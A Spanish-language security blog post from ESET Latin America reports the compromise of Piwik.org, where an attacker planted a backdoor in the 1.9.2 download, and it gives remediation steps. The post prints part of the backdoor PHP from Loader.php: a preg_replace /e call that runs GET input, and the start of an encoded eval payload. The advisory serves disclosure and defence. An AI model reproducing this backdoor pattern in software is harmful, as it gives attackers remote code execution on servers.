El servidor web de Piwik.org fue vulnerado el día 26 de Noviembre por un atacante. El ciberdelincuente modificó el archivo zip disponible para la descarga por parte de los usuarios correspondiente a la versión 1.9.2, agregando código malicioso en el interior de dicho archivo.

Piwik es una herramienta open source que permite recolectar estadísticas sobre un servidor web. Además posee funcionalidades tales como la generación de reportes detallados sobre los visitantes que recibe un sitio web, realización de campañas de marketing, entre otras.

Aparentemente, y según el propio blog de Piwik, el atacante habría comprometido el servidor por una vulnerabilidad en un plugin de Wordpress. Ya se han visto casos donde esta plataforma ha sido vulnerada, incluso convirtiendo a Wordpress en vector de propagación de Flashback.

Luego del compromiso, el archivo descargable se mantuvo con la modificación del código malicioso durante algunas horas, por lo que los usuarios que hayan descargado el software durante ese período obtuvieron una versión maliciosa del mismo. Específicamente, el archivo modificado fue Loader.php ubicado dentro de la carpeta piwik/core/. A continuación se adjunta parte del código malicioso:

<?php Error_Reporting(0);       if(isset($_GET['g']) && isset($_GET['s'])) {

preg_replace("/(.+)/e", $_GET['g'], 'dwm');     exit;

}

if (file_exists(dirname(__FILE__)."/lic.log")) exit;

eval(gzuncompress(base64_decode('eF6Fkl9LwzAUxb+KD0I3EOmabhCkD/OhLWNOVrF/IlKatiIlnbIOZ/bpzb2pAyXRl7uF/s7JuffmMlrf3y7XD09OSW

Según información del propio foro de discusión de Piwik, el código malicioso insertado corresponde a un backdoor que permitiría al atacante ejecutar cualquier función válida que pueda ejecutarse mediante eval().

En el caso de que se haya instalado la versión modificada es recomendable seguir los siguientes pasos para solucionar el problema:

  • Realizar una copia de piwik/config/config.ini.php.
  • Borrar el directorio completo de piwik/.
  • Descargar la última versión de Piwik (el código malicioso ya fue removido).
  • Descomprimir el archivo descargado y situarlo en el servidor.
  • Copiar el archivo de configuración config.ini.php previamente respaldado en el directorio /piwik/config/.
  • En esta instancia, Piwik debería ejecutarse correctamente con la configuración anterior.

Cabe destacar que ningún tipo de información correspondiente a los usuarios de este software ha sido extraída del servidor vulnerado debido a que el mismo no guarda información correspondiente a sus usuarios.

El compromiso de servidores web por parte de los ciberdelincuentes tiene distintas motivaciones. En este caso fue la modificación de parte del software disponible para infectar a aquellos usuarios que descargan el mismo. Han existido otros casos, como por ejemplo el alojamiento de Dorkbot en un hosting web vulnerado donde en este caso se propagaba el afamado código malicioso que ya tiene más de 80.000 bots en Latinoamérica.

Desde ESET Latinoamérica recomendamos la lectura de nuestros 10 consejos para no infectarse que en combinación con el uso de una solución antivirus con capacidad de detección proactiva forman el complemento necesario para estar protegidos.

Fernando Catoira
Analista de Seguridad